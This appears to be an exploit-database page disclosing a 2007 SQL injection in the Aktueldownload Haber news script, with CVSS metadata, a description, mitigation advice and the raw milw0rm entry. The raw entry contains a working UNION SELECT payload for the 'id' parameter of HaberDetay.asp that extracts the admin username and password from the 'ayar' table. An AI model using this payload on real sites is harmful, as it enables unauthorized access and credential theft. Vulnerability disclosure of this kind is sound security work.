header-logo
Suggest Exploit
vendor:
Aktueldownload Haber scripti
by:
xoron
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Aktueldownload Haber scripti
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability

The vulnerability allows an attacker to perform a SQL injection attack on the Aktueldownload Haber scripti (id) through the HaberDetay.asp page. By manipulating the 'id' parameter, an attacker can execute arbitrary SQL queries and retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, using prepared statements or parameterized queries can help prevent SQL injection attacks.
Source

Exploit-DB raw data:

-----------------------------------------------------------------------

Aktueldownload Haber scripti (id) Remote SQL Injection Vulnerability

-----------------------------------------------------------------------


Bulan: xoron

xoron.info - xoron.biz

-----------------------------------------------------------------------

Exploit:  HaberDetay.asp
?id=-1+union+select+0,1,kadi,4,5,parola,7+from+ayar

-----------------------------------------------------------------------

AƧyklama: username
Eklenme tarihi: password

-----------------------------------------------------------------------


Download: http://www.aspindir.com/Goster/4656


-----------------------------------------------------------------------

# milw0rm.com [2007-02-15]